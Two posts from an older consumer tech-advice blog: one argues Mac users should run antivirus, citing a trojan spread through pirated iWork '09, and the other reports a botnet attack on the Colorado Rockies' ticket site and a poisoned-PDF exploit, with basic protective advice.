Tech – for Everyone

Tech Tips and Tricks & Advice – written in plain English.

Do You Need AV on a Mac?

I get asked that from time to time. But usually, I’m not asked, I’m told. “I don’t need all that *crud*. I’m on a Mac.”
Usually, but not always, there’s a certain tone the speaker adopts when uttering that Standard Line (read, “dogma”) that conveys a smug superiority.. but, hey, everyone’s entitled to a little.. uh, delusion or two in my book. Keeps life interesting.

Basis in fact: There are some reasons for this don’t-need-an-antivirus belief system. One is, Apple itself has promoted the idea. Another is, there were hardly any (and at some points in history, no, zero, zip, nada) viruses / trojans / worms / etc. written to exploit the Mac OS. And even now, they’re considered “rare”.

Cyber-criminals (aka “hackers”) knew that less than 5% of computers were Macs, and essentially none of the “pots of gold” (database servers) were running the Mac OS.. so why write a attack program? (Apple products have been proven quite “hackable” – iTunes, QuickTime, Safari actually rank quite high on the list. See, Firefox More Secure? Tops ‘Most Vulnerable’ List) Answer– There’s basically nothing to attack with it.

Then and now: But, that was before Vista; and, the “I’m a Mac” series of television commercials. Now, instead of approximately 1-in-20 PC’s being Macs, it’s more like 1-in-10. Now, the idea of a all-Mac botnet has some merit (and a true Mac fan will tell you, all the Windows PC’s have already been taken!). An all-Mac botnet wouldn’t be all that big.. but the new numbers mean it’d be big enough for some uses…

So, sure enough, some enterprising criminal wrote a backdoor worm and glued it to a copy of iWork ’09 and posted it to several of the torrent sites, knowing that Mac-using folks who don’t like paying for things would download and install it.
Voilà, we got us an all-Mac botnet.
[note: this has happened before, to Mac+LimeWire² users; see, Firms discover Trojan horse targeted at Mac OS X]

Someone has named this worm “iServices.A”, which is much more rational and.. nicer (ahem) than what I might have named it. This worm allows the hacker to do pretty much what he wants with the infected machine, which so far appears to be sending boatloads of spam to specific URL’s, in what is called a “denial of service” attack (the flood of messages overloads the server, and causes it to ‘crash’/shutdown)(see, Our Modern Nightmare – Zombie Attack)

Me? I have consistently advised installing an AV, no matter what platform/OS you’re running, just as I consistently advise making backup copies of your files, (yes, I have been accused of being a bit of a “belt-and-suspenders” man) for one very simple reason — what is the cost if you do, versus what is the (potential) cost if you don’t?
Plus.. it’s simple math: the more popular Macs get, the more they’ll be targeted.

Feel free to disagree, but you won’t get me to change my mind. My Tiger machine has antivirus onboard.. though I don’t know why I bothered, I never turn the thing on.

Today’s free link(s):
* Brian Krebs has an absolutely great article detailing this worm, and I leave it to him to make what may be the most important point on the subject–
“Leaving aside (hopefully) the question of whether Mac users need anti-virus, I’ve tried to impress upon readers the importance of avoiding risky behaviors online that could jeopardize the security of their systems. The reality is that installing programs downloaded from P2P networks is about the most insecure practice a computer user can engage in,¹ regardless of the operating system in use.

This is why I think it’s important to call out this Trojan. Yes, it infects Macs, and that’s something we don’t see very often. But it’s also a teachable moment to remind readers that no security software is going to protect the user who is intent on installing software that may be tainted with malware, as long as that user is willing to ignore any advice (or alerts) to the contrary.

I highly recommend you read the whole article, Pirated iWork Software Infects Macs With Trojan Horse. Once you do, I think you’ll understand why he’s on my Blogroll.

* Blogroll member Bill Mullins posted an article that takes a look at the P2P “phenomenon” that I also highly recommend, Peer to Peer File Sharing – Evaluate the Risks – Consider the Trade-Offs

* And this article is a very good answer to the question, Is Mac still the safer bet?

¹ emphasis, mine.
² A very popular BitTorrent-style peer-to-peer program.

* One last thought.. anyone care to guess what percentage of people’s machines that I look at in my “real job” have LimeWire installed?

Copyright 2007-9 © Tech Paul. All rights reserved. post to jaanix

Share this post :

January 25, 2009 Posted by | advice, antivirus, Apple, computers, cyber crime, hackers, News, security, tech | , , , , , , , , , , , , , , , , , , , , , | 2 Comments

Botnets hurt Rockies and, poison .pdf’s (updated)

You have to feel sorry for the Colorado Rockies, even if you’re not a fan. After a miraculous run of victories swept them into World Series, the Red Sox slammed them 13-1 in Game One (ouch!). To add insult to injury, their online ticket sales website crashed (after only 500 tickets were sold) on Monday, which they believe was the result of a cyber-attack; namely a DoS attack launched from a botnet.
“Our website, and ultimately our fans and our organization, were the victim of an external, malicious attack that shut down the system and kept our fans from being able to purchase their World Series tickets,” Keli McGregor, team president, said Monday in a news release.

Very early in the history of Tech–for EveryoneI wrote two articles which discuss botnets and how your computer could be a zombie without your knowing it — and a couple of steps you can take to prevent a hacker from using your machine to mail out spam, or launch attacks.

The first I titled “Some basic security pointers #1“, which I always think of by its opening sentence, “is your computer a zombie?”. In it I discuss User Account passwords, what makes a good password, and the hidden Windows Administrator account, and provide a link to a tool that tests the effectiveness of your firewall. (Click the links to view the articles.)

The second article was titled “The FBI and Operation: Bot Roast” which opens by asking the question, “is your computer a threat to national security?” In this article I discussed malware, such as rootkits and trojan horses, and how hackers use these to take control of your machine, and use it for their own, nefarious, purposes. I explained what a botnet is, and I provided a link to the pages on my business website where I list several dozen links to the best free antivirus and anti-spyware tools.

Tip of the day: Read these important articles and get educated about hackers and their evil programs, and then download the tools, and take the preventative steps, and thwart these Evil Doers. It is a fact that your machine can be used to interfere with our economic system and way of living.

Tip of the day #2: Do not open any PDFs you receive via email for a while. (Loyal friends and true will note that this is the first time I’ve posted two tips in one day.)
There is currently making the rounds an exploit that uses a trojan horse embedded in a poisoned .pdf attachment to download malware onto your machine. The exploit uses a vulnerability in code found in IE 7 on Windows XP. Microsoft is aware of this, but has yet to release a patch (through Windows Update).
If you aren’t sure what an “exploit” is, I discussed it in an article titled “These folks had a very bad day“, which discusses exploits and vulnerabilities and how this is the Number One hacker technique for gaining control of your machine. In it I demonstrate how to configure your firewall and Update settings, and provide a link to website which will scan your machine for unpatched vulnerabilities and help you get updated and protected.

[update 10/30: From Secure Computing–
Ken Dunham, director of global response for iSight Partners, told SCMagazineUS.com today that one of his source’s honeypots received the infected email once every 10 seconds. This indicates “a fairly heavy spamming taking place,” especially for home users in advance of the weekend, he said.

The shadowy Russian internet service provider, Russian Business Network (RBN), is behind the attacks, which attempt to infect users with two rootkits that seek to steal personal and financial information from compromised PCs, Dunham said.

“You have what looks like a PDF attachment,” he said. “It’s actually exploit code designed to download code from a remote server.”

Adobe patched the bug Monday, so those who upgraded to Adobe Reader 8.1.1 and Acrobat 8.1.1 are safe.”

Today’s free link: By clicking the links to the three articles posted above, and scrolling down to this section of the posts, you will find links to 50+ highly rated free security tools. Please, take advantage of them!

You can help improve this blog by answering a 5-question opinion survey Click Here to take survey

Copyright © 2007 Tech Paul. All rights reserved.

Do you appreciate all the free advice and links to safe and free software I provide six days a weeks–ad free? Do your friends (and me) a favor and let them know about Tech–for Everyone.

Share this post :

October 25, 2007 Posted by | advice, anti-spyware, antivirus, computers, firewall, how to, IE 7, PC, security, tech, Windows, XP | , , , , | 2 Comments